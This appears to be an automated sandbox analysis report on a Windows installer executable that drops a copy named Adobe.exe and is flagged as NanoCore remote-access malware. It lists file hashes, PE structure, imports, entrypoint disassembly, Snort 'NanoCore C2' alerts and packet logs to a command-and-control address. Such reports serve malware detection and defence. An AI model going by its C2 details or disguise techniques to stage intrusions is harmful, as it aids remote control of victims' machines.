                C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\catalog.dat
                Process:C:\Users\user\Desktop\SviRsoKz6E.exe
                File Type:data
                Category:dropped
                Size (bytes):3248
                Entropy (8bit):7.089541637477408
                Encrypted:false
                SSDEEP:96:HjhDjhDjhDjhDjhDjhDjhDjhDjhDjhDjhDjhDjhDjhL:DBBBBBBBBBBBBBp
                MD5:F7F62653B7691175FCE2AF5734050062
                SHA1:7BAA9A5B0A995099E2668BDDE10BED35A680C2CB
                SHA-256:B5D42B27337D1F66323CB7C5EAFD1F7F51EC5E8659D8000754C84F71DC010454
                SHA-512:2608D9E132C9A24855D644701EBB2733004A8DA8811304816735A59209C838627905D00768D3BFC4E6D49140884407AE49936C07D07ECD4DFFF9DDB228406FF8
                Malicious:false
                Reputation:low
                Preview: Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.... S....}FF.2...h.M+....L.#.X..+......*....~f.G0^..;....W2.=...K.~.L..&f...p............:7rH}..../H......L...?...A.K...J.=8x!....+.2e'..E?.G......[.&Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.... S....}FF.2...h.M+....L.#.X..+......*....~f.G0^..;....W2.=...K.~.L..&f...p............:7rH}..../H......L...?...A.K...J.=8x!....+.2e'..E?.G......[.&Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.... S....}FF.2...h.M+....L.#.X..+......*....~f.G0^..;....W2.=...K.~.L..&f...p............:7rH}..../H......L...?...A.K...J.=8x!....+.2e'..E?.G......[.&Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.... S....}FF.2...h.M+....L.#.X..+......*....~f.G0^..;....W2.=...K.~.L..&f...p............:7rH}..../H......L...?...A.K...J.=8x!....+.2e'..E?.G......[.&Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.
                C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat
                Process:C:\Users\user\Desktop\SviRsoKz6E.exe
                File Type:ISO-8859 text, with no line terminators
                Category:dropped
                Size (bytes):8
                Entropy (8bit):3.0
                Encrypted:false
                SSDEEP:3:3bh:d
                MD5:C53647C3CAED5B2931C0893913100D55
                SHA1:CBC8A05184916603B1BBDC70F18C8D830FE4180E
                SHA-256:4019186F62D722272134B955D57FF97C94729D7E548BD62D2500344861B73EE7
                SHA-512:B7A9FE348543F685B6AFAD2C7BB5AA1DE526AF6576714F727474E081AFD3569B11196D3B1DCD649F059FB597909163F7B23A35E14B9CDCCB38D781289AF9D607
                Malicious:true
                Reputation:low
                Preview: ..>....H
                C:\Users\user\AppData\Roaming\abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyz\Adobe.exe
                Process:C:\Users\user\Desktop\SviRsoKz6E.exe
                File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                Category:dropped
                Size (bytes):700444
                Entropy (8bit):5.894787047059789
                Encrypted:false
                SSDEEP:6144:vqjIDb42WGNpoisfWzTj4+DP0hotN17VlKWhS6Mg1KWozL4ayL:ao42fpguzTj4ThotdlKOMxWozkTL
                MD5:5D59200D61BA34E07E26132F5ACD9619
                SHA1:8FB59154FE08E09B2E9C2F817157B5BC0CCF1DAE
                SHA-256:95F117DEABF4AEB36402033A7CA35E717F7A31C8BF9330ACBF8934FB483C5D3E
                SHA-512:3949898771BD7049990C26320D7C089138DB31294A5B6536E7232D2A32920A5BA6E8B4FBC333899099905ADD59512307E8F311E30F53E145A4364C46CA3C49F2
                Malicious:true
                Antivirus:
                • Antivirus: Joe Sandbox ML, Detection: 100%
                • Antivirus: Virustotal, Detection: 39%, Browse
                • Antivirus: Metadefender, Detection: 14%, Browse
                • Antivirus: ReversingLabs, Detection: 72%
                Reputation:low
                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1)..PG..PG..PG.*_...PG..PF.IPG.*_...PG.sw..PG..VA..PG.Rich.PG.........PE..L.....$_.................b...r.......3............@.......................................@.................................8.......................................................................................................................text....`.......b.................. ..`.rdata..t............f..............@..@.data...8............z..............@....ndata.......P...........................rsrc..............................@..@................................................................................................................................................................................................................................................................................................................................................................

                Static File Info

                General

                File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                Entropy (8bit):5.894787047059789
                TrID:
                • Win32 Executable (generic) a (10002005/4) 99.96%
                • Generic Win/DOS Executable (2004/3) 0.02%
                • DOS Executable Generic (2002/1) 0.02%
                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                File name:SviRsoKz6E.exe
                File size:700444
                MD5:5d59200d61ba34e07e26132f5acd9619
                SHA1:8fb59154fe08e09b2e9c2f817157b5bc0ccf1dae
                SHA256:95f117deabf4aeb36402033a7ca35e717f7a31c8bf9330acbf8934fb483c5d3e
                SHA512:3949898771bd7049990c26320d7c089138db31294a5b6536e7232d2a32920a5ba6e8b4fbc333899099905add59512307e8f311e30f53e145a4364c46ca3c49f2
                SSDEEP:6144:vqjIDb42WGNpoisfWzTj4+DP0hotN17VlKWhS6Mg1KWozL4ayL:ao42fpguzTj4ThotdlKOMxWozkTL
                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1)..PG..PG..PG.*_...PG..PF.IPG.*_...PG..sw..PG..VA..PG.Rich.PG.........PE..L.....$_.................b...r.......3............@

                File Icon

                Icon Hash:e0d8d8d4d4d8d0e8

                Static PE Info

                General

                Entrypoint:0x403312
                Entrypoint Section:.text
                Digitally signed:false
                Imagebase:0x400000
                Subsystem:windows gui
                Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                Time Stamp:0x5F24D6A7 [Sat Aug 1 02:42:47 2020 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:4
                OS Version Minor:0
                File Version Major:4
                File Version Minor:0
                Subsystem Version Major:4
                Subsystem Version Minor:0
                Import Hash:ced282d9b261d1462772017fe2f6972b

                Entrypoint Preview

                Instruction
                sub esp, 00000184h
                push ebx
                push esi
                push edi
                xor ebx, ebx
                push 00008001h
                mov dword ptr [esp+18h], ebx
                mov dword ptr [esp+10h], 0040A198h
                mov dword ptr [esp+20h], ebx
                mov byte ptr [esp+14h], 00000020h
                call dword ptr [004080B8h]
                call dword ptr [004080BCh]
                and eax, BFFFFFFFh
                cmp ax, 00000006h
                mov dword ptr [0042472Ch], eax
                je 00007FFAE4F61A13h
                push ebx
                call 00007FFAE4F64B76h
                cmp eax, ebx
                je 00007FFAE4F61A09h
                push 00000C00h
                call eax
                mov esi, 004082A0h
                push esi
                call 00007FFAE4F64AF2h
                push esi
                call dword ptr [004080CCh]
                lea esi, dword ptr [esi+eax+01h]
                cmp byte ptr [esi], bl
                jne 00007FFAE4F619EDh
                push 0000000Bh
                call 00007FFAE4F64B4Ah
                push 00000009h
                call 00007FFAE4F64B43h
                push 00000007h
                mov dword ptr [00424724h], eax
                call 00007FFAE4F64B37h
                cmp eax, ebx
                je 00007FFAE4F61A11h
                push 0000001Eh
                call eax
                test eax, eax
                je 00007FFAE4F61A09h
                or byte ptr [0042472Fh], 00000040h
                push ebp
                call dword ptr [00408038h]
                push ebx
                call dword ptr [00408288h]
                mov dword ptr [004247F8h], eax
                push ebx
                lea eax, dword ptr [esp+38h]
                push 00000160h
                push eax
                push ebx
                push 0041FCE8h
                call dword ptr [0040816Ch]
                push 0040A188h

                Rich Headers

                Programming Language:
                • [EXP] VC++ 6.0 SP5 build 8804

                Data Directories

                NameVirtual AddressVirtual Size Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IMPORT0x84380xa0.rdata
                IMAGE_DIRECTORY_ENTRY_RESOURCE0x2d0000x5adc8.rsrc
                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IAT0x80000x29c.rdata
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                Sections

                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                .text0x10000x60d50x6200False0.663066007653data6.4176717642IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                .rdata0x80000x12740x1400False0.4337890625data5.06106734837IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                .data0xa0000x1a8380x600False0.436197916667data3.99516288039IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                .ndata0x250000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                .rsrc0x2d0000x5adc80x5ae00False0.0468051495873data2.65056787048IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                Resources

                NameRVASizeTypeLanguageCountry
                RT_ICON0x2d2800x42028data
                RT_ICON0x6f2a80x468GLS_BINARY_LSB_FIRST
                RT_ICON0x6f7100x25a8dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0
                RT_ICON0x71cb80x10a8dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 0, next used block 0
                RT_ICON0x72d600x10828dBase III DBT, version number 0, next free block index 40
                RT_ICON0x835880x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0
                RT_DIALOG0x877b00x100dataEnglishUnited States
                RT_DIALOG0x878b00x11cdataEnglishUnited States
                RT_DIALOG0x879cc0x60dataEnglishUnited States
                RT_GROUP_ICON0x87a2c0x5adata
                RT_MANIFEST0x87a880x340XML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                Imports

                DLLImport
                ADVAPI32.dllRegCreateKeyExA, RegEnumKeyA, RegQueryValueExA, RegSetValueExA, RegCloseKey, RegDeleteValueA, RegDeleteKeyA, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, SetFileSecurityA, RegOpenKeyExA, RegEnumValueA
                SHELL32.dllSHGetFileInfoA, SHFileOperationA, SHGetPathFromIDListA, ShellExecuteExA, SHGetSpecialFolderLocation, SHBrowseForFolderA
                ole32.dllIIDFromString, OleInitialize, OleUninitialize, CoCreateInstance, CoTaskMemFree
                COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                USER32.dllSetClipboardData, CharPrevA, CallWindowProcA, PeekMessageA, DispatchMessageA, MessageBoxIndirectA, GetDlgItemTextA, SetDlgItemTextA, GetSystemMetrics, CreatePopupMenu, AppendMenuA, TrackPopupMenu, FillRect, EmptyClipboard, LoadCursorA, GetMessagePos, CheckDlgButton, GetSysColor, SetCursor, GetWindowLongA, SetClassLongA, SetWindowPos, IsWindowEnabled, GetWindowRect, GetSystemMenu, EnableMenuItem, RegisterClassA, ScreenToClient, EndDialog, GetClassInfoA, SystemParametersInfoA, CreateWindowExA, ExitWindowsEx, DialogBoxParamA, CharNextA, SetTimer, DestroyWindow, CreateDialogParamA, SetForegroundWindow, SetWindowTextA, PostQuitMessage, SendMessageTimeoutA, ShowWindow, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, GetDC, SetWindowLongA, LoadImageA, InvalidateRect, ReleaseDC, EnableWindow, BeginPaint, SendMessageA, DefWindowProcA, DrawTextA, GetClientRect, EndPaint, IsWindowVisible, CloseClipboard, OpenClipboard
                GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectA, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetProcAddress, GetSystemDirectoryA, WideCharToMultiByte, MoveFileExA, ReadFile, GetTempFileNameA, WriteFile, RemoveDirectoryA, CreateProcessA, CreateFileA, GetLastError, CreateThread, CreateDirectoryA, GlobalUnlock, GetDiskFreeSpaceA, GlobalLock, SetErrorMode, GetVersion, lstrcpynA, GetCommandLineA, GetTempPathA, lstrlenA, SetEnvironmentVariableA, ExitProcess, GetWindowsDirectoryA, GetCurrentProcess, GetModuleFileNameA, CopyFileA, GetTickCount, Sleep, GetFileSize, GetFileAttributesA, SetCurrentDirectoryA, SetFileAttributesA, GetFullPathNameA, GetShortPathNameA, MoveFileA, CompareFileTime, SetFileTime, SearchPathA, lstrcmpiA, lstrcmpA, CloseHandle, GlobalFree, GlobalAlloc, ExpandEnvironmentStringsA, LoadLibraryExA, FreeLibrary, lstrcpyA, lstrcatA, FindClose, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, SetFilePointer, GetModuleHandleA, FindNextFileA, FindFirstFileA, DeleteFileA, MulDiv

                Possible Origin

                Language of compilation systemCountry where language is spokenMap
                EnglishUnited States

                Network Behavior

                Snort IDS Alerts

                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                04/04/21-23:27:49.687678TCP2025019ET TROJAN Possible NanoCore C2 60B497027632192.168.2.3104.37.1.32
                04/04/21-23:27:57.046711TCP2025019ET TROJAN Possible NanoCore C2 60B497037632192.168.2.3104.37.1.32
                04/04/21-23:28:04.129392TCP2025019ET TROJAN Possible NanoCore C2 60B497047632192.168.2.3104.37.1.32
                04/04/21-23:28:11.005289TCP2025019ET TROJAN Possible NanoCore C2 60B497117632192.168.2.3104.37.1.32
                04/04/21-23:28:18.233125TCP2025019ET TROJAN Possible NanoCore C2 60B497237632192.168.2.3104.37.1.32
                04/04/21-23:28:25.281606TCP2025019ET TROJAN Possible NanoCore C2 60B497327632192.168.2.3104.37.1.32
                04/04/21-23:28:32.117036TCP2025019ET TROJAN Possible NanoCore C2 60B497357632192.168.2.3104.37.1.32
                04/04/21-23:28:38.186951TCP2025019ET TROJAN Possible NanoCore C2 60B497377632192.168.2.3104.37.1.32
                04/04/21-23:28:45.080473TCP2025019ET TROJAN Possible NanoCore C2 60B497397632192.168.2.3104.37.1.32
                04/04/21-23:28:52.125456TCP2025019ET TROJAN Possible NanoCore C2 60B497487632192.168.2.3104.37.1.32
                04/04/21-23:28:59.094085TCP2025019ET TROJAN Possible NanoCore C2 60B497497632192.168.2.3104.37.1.32
                04/04/21-23:29:06.375320TCP2025019ET TROJAN Possible NanoCore C2 60B497507632192.168.2.3104.37.1.32
                04/04/21-23:29:13.365705TCP2025019ET TROJAN Possible NanoCore C2 60B497517632192.168.2.3104.37.1.32
                04/04/21-23:29:20.214206TCP2025019ET TROJAN Possible NanoCore C2 60B497527632192.168.2.3104.37.1.32
                04/04/21-23:29:27.426250TCP2025019ET TROJAN Possible NanoCore C2 60B497557632192.168.2.3104.37.1.32
                04/04/21-23:29:34.224301TCP2025019ET TROJAN Possible NanoCore C2 60B497567632192.168.2.3104.37.1.32
                04/04/21-23:29:41.276527TCP2025019ET TROJAN Possible NanoCore C2 60B497577632192.168.2.3104.37.1.32
                04/04/21-23:29:49.469679TCP2025019ET TROJAN Possible NanoCore C2 60B497587632192.168.2.3104.37.1.32

                Network Port Distribution

                TCP Packets

                TimestampSource PortDest PortSource IPDest IP
                Apr 4, 2021 23:27:49.275635958 CEST497027632192.168.2.3104.37.1.32
                Apr 4, 2021 23:27:49.640242100 CEST763249702104.37.1.32192.168.2.3
                Apr 4, 2021 23:27:49.640615940 CEST497027632192.168.2.3104.37.1.32
                Apr 4, 2021 23:27:49.687678099 CEST497027632192.168.2.3104.37.1.32
                Apr 4, 2021 23:27:50.065958023 CEST763249702104.37.1.32192.168.2.3
                Apr 4, 2021 23:27:50.074054003 CEST497027632192.168.2.3104.37.1.32
                Apr 4, 2021 23:27:50.436144114 CEST763249702104.37.1.32192.168.2.3
                Apr 4, 2021 23:27:50.436258078 CEST497027632192.168.2.3104.37.1.32
                Apr 4, 2021 23:27:50.840785980 CEST763249702104.37.1.32192.168.2.3
                Apr 4, 2021 23:27:50.841037989 CEST497027632192.168.2.3104.37.1.32
                Apr 4, 2021 23:27:51.245646954 CEST763249702104.37.1.32192.168.2.3
                Apr 4, 2021 23:27:51.264710903 CEST763249702104.37.1.32192.168.2.3
                Apr 4, 2021 23:27:51.264766932 CEST763249702104.37.1.32192.168.2.3
                Apr 4, 2021 23:27:51.264810085 CEST763249702104.37.1.32192.168.2.3
                Apr 4, 2021 23:27:51.264849901 CEST763249702104.37.1.32192.168.2.3
                Apr 4, 2021 23:27:51.264889002 CEST763249702104.37.1.32192.168.2.3
                Apr 4, 2021 23:27:51.264941931 CEST763249702104.37.1.32192.168.2.3
                Apr 4, 2021 23:27:51.264950037 CEST497027632192.168.2.3104.37.1.32
                Apr 4, 2021 23:27:51.264986038 CEST763249702104.37.1.32192.168.2.3
                Apr 4, 2021 23:27:51.264995098 CEST497027632192.168.2.3104.37.1.32
                Apr 4, 2021 23:27:51.265002012 CEST497027632192.168.2.3104.37.1.32
                Apr 4, 2021 23:27:51.265026093 CEST763249702104.37.1.32192.168.2.3
                Apr 4, 2021 23:27:51.265065908 CEST763249702104.37.1.32192.168.2.3
                Apr 4, 2021 23:27:51.265105009 CEST763249702104.37.1.32192.168.2.3
                Apr 4, 2021 23:27:51.265125990 CEST497027632192.168.2.3104.37.1.32
                Apr 4, 2021 23:27:51.265947104 CEST497027632192.168.2.3104.37.1.32
                Apr 4, 2021 23:27:51.381675959 CEST497027632192.168.2.3104.37.1.32
                Apr 4, 2021 23:27:51.626720905 CEST763249702104.37.1.32192.168.2.3
                Apr 4, 2021 23:27:51.626779079 CEST763249702104.37.1.32192.168.2.3
                Apr 4, 2021 23:27:51.626863956 CEST497027632192.168.2.3104.37.1.32
                Apr 4, 2021 23:27:51.627043962 CEST763249702104.37.1.32192.168.2.3
                Apr 4, 2021 23:27:51.627084970 CEST763249702104.37.1.32192.168.2.3
                Apr 4, 2021 23:27:51.627115011 CEST763249702104.37.1.32192.168.2.3
                Apr 4, 2021 23:27:51.627157927 CEST497027632192.168.2.3104.37.1.32
                Apr 4, 2021 23:27:51.627204895 CEST763249702104.37.1.32192.168.2.3
                Apr 4, 2021 23:27:51.627206087 CEST497027632192.168.2.3104.37.1.32
                Apr 4, 2021 23:27:51.627250910 CEST763249702104.37.1.32192.168.2.3
                Apr 4, 2021 23:27:51.627288103 CEST497027632192.168.2.3104.37.1.32
                Apr 4, 2021 23:27:51.627290964 CEST763249702104.37.1.32192.168.2.3
                Apr 4, 2021 23:27:51.627348900 CEST497027632192.168.2.3104.37.1.32
                Apr 4, 2021 23:27:51.627388954 CEST763249702104.37.1.32192.168.2.3
                Apr 4, 2021 23:27:51.627403975 CEST497027632192.168.2.3104.37.1.32
                Apr 4, 2021 23:27:51.627430916 CEST763249702104.37.1.32192.168.2.3
                Apr 4, 2021 23:27:51.627465963 CEST497027632192.168.2.3104.37.1.32
                Apr 4, 2021 23:27:51.627469063 CEST763249702104.37.1.32192.168.2.3
                Apr 4, 2021 23:27:51.627496958 CEST497027632192.168.2.3104.37.1.32
                Apr 4, 2021 23:27:51.627507925 CEST763249702104.37.1.32192.168.2.3
                Apr 4, 2021 23:27:51.627542019 CEST497027632192.168.2.3104.37.1.32
                Apr 4, 2021 23:27:51.627548933 CEST763249702104.37.1.32192.168.2.3
                Apr 4, 2021 23:27:51.627572060 CEST497027632192.168.2.3104.37.1.32
                Apr 4, 2021 23:27:51.627588987 CEST763249702104.37.1.32192.168.2.3
                Apr 4, 2021 23:27:51.627630949 CEST497027632192.168.2.3104.37.1.32
                Apr 4, 2021 23:27:51.627636909 CEST763249702104.37.1.32192.168.2.3
                Apr 4, 2021 23:27:51.627679110 CEST497027632192.168.2.3104.37.1.32
                Apr 4, 2021 23:27:51.627681017 CEST763249702104.37.1.32192.168.2.3
                Apr 4, 2021 23:27:51.627723932 CEST763249702104.37.1.32192.168.2.3
                Apr 4, 2021 23:27:51.627738953 CEST497027632192.168.2.3104.37.1.32
                Apr 4, 2021 23:27:51.627763987 CEST763249702104.37.1.32192.168.2.3
                Apr 4, 2021 23:27:51.627803087 CEST763249702104.37.1.32192.168.2.3
                Apr 4, 2021 23:27:51.627813101 CEST497027632192.168.2.3104.37.1.32
                Apr 4, 2021 23:27:51.627842903 CEST763249702104.37.1.32192.168.2.3
                Apr 4, 2021 23:27:51.627882004 CEST497027632192.168.2.3104.37.1.32
                Apr 4, 2021 23:27:51.627918959 CEST497027632192.168.2.3104.37.1.32
                Apr 4, 2021 23:27:51.783688068 CEST763249702104.37.1.32192.168.2.3
                Apr 4, 2021 23:27:51.988962889 CEST763249702104.37.1.32192.168.2.3
                Apr 4, 2021 23:27:51.989027977 CEST763249702104.37.1.32192.168.2.3
                Apr 4, 2021 23:27:51.989296913 CEST497027632192.168.2.3104.37.1.32
                Apr 4, 2021 23:27:51.989691973 CEST763249702104.37.1.32192.168.2.3
                Apr 4, 2021 23:27:51.989733934 CEST763249702104.37.1.32192.168.2.3
                Apr 4, 2021 23:27:51.989773989 CEST763249702104.37.1.32192.168.2.3
                Apr 4, 2021 23:27:51.989813089 CEST763249702104.37.1.32192.168.2.3
                Apr 4, 2021 23:27:51.989862919 CEST763249702104.37.1.32192.168.2.3
                Apr 4, 2021 23:27:51.989911079 CEST763249702104.37.1.32192.168.2.3
                Apr 4, 2021 23:27:51.989936113 CEST497027632192.168.2.3104.37.1.32
                Apr 4, 2021 23:27:51.989949942 CEST763249702104.37.1.32192.168.2.3
                Apr 4, 2021 23:27:51.989963055 CEST497027632192.168.2.3104.37.1.32
                Apr 4, 2021 23:27:51.989995003 CEST763249702104.37.1.32192.168.2.3
                Apr 4, 2021 23:27:51.990010977 CEST497027632192.168.2.3104.37.1.32
                Apr 4, 2021 23:27:51.990036964 CEST763249702104.37.1.32192.168.2.3
                Apr 4, 2021 23:27:51.990076065 CEST763249702104.37.1.32192.168.2.3
                Apr 4, 2021 23:27:51.990097046 CEST497027632192.168.2.3104.37.1.32
                Apr 4, 2021 23:27:51.990117073 CEST763249702104.37.1.32192.168.2.3
                Apr 4, 2021 23:27:51.990170002 CEST497027632192.168.2.3104.37.1.32
                Apr 4, 2021 23:27:51.990492105 CEST763249702104.37.1.32192.168.2.3
                Apr 4, 2021 23:27:51.990535021 CEST763249702104.37.1.32192.168.2.3
                Apr 4, 2021 23:27:51.990585089 CEST763249702104.37.1.32192.168.2.3
                Apr 4, 2021 23:27:51.990612984 CEST497027632192.168.2.3104.37.1.32
                Apr 4, 2021 23:27:51.990627050 CEST763249702104.37.1.32192.168.2.3
                Apr 4, 2021 23:27:51.990669012 CEST763249702104.37.1.32192.168.2.3
                Apr 4, 2021 23:27:51.990710020 CEST763249702104.37.1.32192.168.2.3
                Apr 4, 2021 23:27:51.990727901 CEST497027632192.168.2.3104.37.1.32
                Apr 4, 2021 23:27:51.990750074 CEST763249702104.37.1.32192.168.2.3
                Apr 4, 2021 23:27:51.990765095 CEST497027632192.168.2.3104.37.1.32
                Apr 4, 2021 23:27:51.990789890 CEST763249702104.37.1.32192.168.2.3
                Apr 4, 2021 23:27:51.990829945 CEST763249702104.37.1.32192.168.2.3
                Apr 4, 2021 23:27:51.990869999 CEST763249702104.37.1.32192.168.2.3
                Apr 4, 2021 23:27:51.990879059 CEST497027632192.168.2.3104.37.1.32
                Apr 4, 2021 23:27:51.990920067 CEST763249702104.37.1.32192.168.2.3
                Apr 4, 2021 23:27:51.990942955 CEST497027632192.168.2.3104.37.1.32
                Apr 4, 2021 23:27:51.990966082 CEST763249702104.37.1.32192.168.2.3
                Apr 4, 2021 23:27:51.991003990 CEST763249702104.37.1.32192.168.2.3
                Apr 4, 2021 23:27:51.991007090 CEST497027632192.168.2.3104.37.1.32
                Apr 4, 2021 23:27:51.991044044 CEST763249702104.37.1.32192.168.2.3
                Apr 4, 2021 23:27:51.991085052 CEST763249702104.37.1.32192.168.2.3
                Apr 4, 2021 23:27:51.991122961 CEST763249702104.37.1.32192.168.2.3
                Apr 4, 2021 23:27:51.991132021 CEST497027632192.168.2.3104.37.1.32
                Apr 4, 2021 23:27:51.991163015 CEST763249702104.37.1.32192.168.2.3
                Apr 4, 2021 23:27:51.991203070 CEST763249702104.37.1.32192.168.2.3
                Apr 4, 2021 23:27:51.991216898 CEST497027632192.168.2.3104.37.1.32
                Apr 4, 2021 23:27:51.991252899 CEST763249702104.37.1.32192.168.2.3
                Apr 4, 2021 23:27:51.991276026 CEST497027632192.168.2.3104.37.1.32
                Apr 4, 2021 23:27:51.991298914 CEST763249702104.37.1.32192.168.2.3
                Apr 4, 2021 23:27:51.991338015 CEST763249702104.37.1.32192.168.2.3
                Apr 4, 2021 23:27:51.991354942 CEST497027632192.168.2.3104.37.1.32
                Apr 4, 2021 23:27:51.991379976 CEST763249702104.37.1.32192.168.2.3
                Apr 4, 2021 23:27:51.991419077 CEST763249702104.37.1.32192.168.2.3
                Apr 4, 2021 23:27:51.991435051 CEST497027632192.168.2.3104.37.1.32
                Apr 4, 2021 23:27:51.991460085 CEST763249702104.37.1.32192.168.2.3
                Apr 4, 2021 23:27:51.991499901 CEST763249702104.37.1.32192.168.2.3
                Apr 4, 2021 23:27:51.991538048 CEST763249702104.37.1.32192.168.2.3
                Apr 4, 2021 23:27:51.991542101 CEST497027632192.168.2.3104.37.1.32
                Apr 4, 2021 23:27:51.991585970 CEST763249702104.37.1.32192.168.2.3
                Apr 4, 2021 23:27:51.991626978 CEST497027632192.168.2.3104.37.1.32
                Apr 4, 2021 23:27:51.991674900 CEST497027632192.168.2.3104.37.1.32
                Apr 4, 2021 23:27:52.351577044 CEST763249702104.37.1.32192.168.2.3
                Apr 4, 2021 23:27:52.351634979 CEST763249702104.37.1.32192.168.2.3
                Apr 4, 2021 23:27:52.351675987 CEST763249702104.37.1.32192.168.2.3
                Apr 4, 2021 23:27:52.351715088 CEST763249702104.37.1.32192.168.2.3
                Apr 4, 2021 23:27:52.351758957 CEST763249702104.37.1.32192.168.2.3
                Apr 4, 2021 23:27:52.351797104 CEST763249702104.37.1.32192.168.2.3
                Apr 4, 2021 23:27:52.351807117 CEST497027632192.168.2.3104.37.1.32
                Apr 4, 2021 23:27:52.351881027 CEST497027632192.168.2.3104.37.1.32
                Apr 4, 2021 23:27:52.351995945 CEST763249702104.37.1.32192.168.2.3
                Apr 4, 2021 23:27:52.352045059 CEST763249702104.37.1.32192.168.2.3
                Apr 4, 2021 23:27:52.352087975 CEST763249702104.37.1.32192.168.2.3
                Apr 4, 2021 23:27:52.352127075 CEST763249702104.37.1.32192.168.2.3
                Apr 4, 2021 23:27:52.352139950 CEST497027632192.168.2.3104.37.1.32
                Apr 4, 2021 23:27:52.352197886 CEST497027632192.168.2.3104.37.1.32
                Apr 4, 2021 23:27:52.352591038 CEST763249702104.37.1.32192.168.2.3
                Apr 4, 2021 23:27:52.352690935 CEST763249702104.37.1.32192.168.2.3
                Apr 4, 2021 23:27:52.352732897 CEST763249702104.37.1.32192.168.2.3
                Apr 4, 2021 23:27:52.352771997 CEST763249702104.37.1.32192.168.2.3
                Apr 4, 2021 23:27:52.352771997 CEST497027632192.168.2.3104.37.1.32
                Apr 4, 2021 23:27:52.352813959 CEST763249702104.37.1.32192.168.2.3
                Apr 4, 2021 23:27:52.352854967 CEST763249702104.37.1.32192.168.2.3
                Apr 4, 2021 23:27:52.352860928 CEST497027632192.168.2.3104.37.1.32
                Apr 4, 2021 23:27:52.352895021 CEST763249702104.37.1.32192.168.2.3
                Apr 4, 2021 23:27:52.352933884 CEST497027632192.168.2.3104.37.1.32
                Apr 4, 2021 23:27:52.352946043 CEST763249702104.37.1.32192.168.2.3
                Apr 4, 2021 23:27:52.352989912 CEST763249702104.37.1.32192.168.2.3
                Apr 4, 2021 23:27:52.353022099 CEST497027632192.168.2.3104.37.1.32
                Apr 4, 2021 23:27:52.353028059 CEST763249702104.37.1.32192.168.2.3
                Apr 4, 2021 23:27:52.353069067 CEST763249702104.37.1.32192.168.2.3
                Apr 4, 2021 23:27:52.353107929 CEST763249702104.37.1.32192.168.2.3
                Apr 4, 2021 23:27:52.353125095 CEST497027632192.168.2.3104.37.1.32
                Apr 4, 2021 23:27:52.353147030 CEST763249702104.37.1.32192.168.2.3
                Apr 4, 2021 23:27:52.353187084 CEST763249702104.37.1.32192.168.2.3
                Apr 4, 2021 23:27:52.353209019 CEST497027632192.168.2.3104.37.1.32
                Apr 4, 2021 23:27:52.353225946 CEST763249702104.37.1.32192.168.2.3
                Apr 4, 2021 23:27:52.353264093 CEST497027632192.168.2.3104.37.1.32
                Apr 4, 2021 23:27:52.353279114 CEST763249702104.37.1.32192.168.2.3
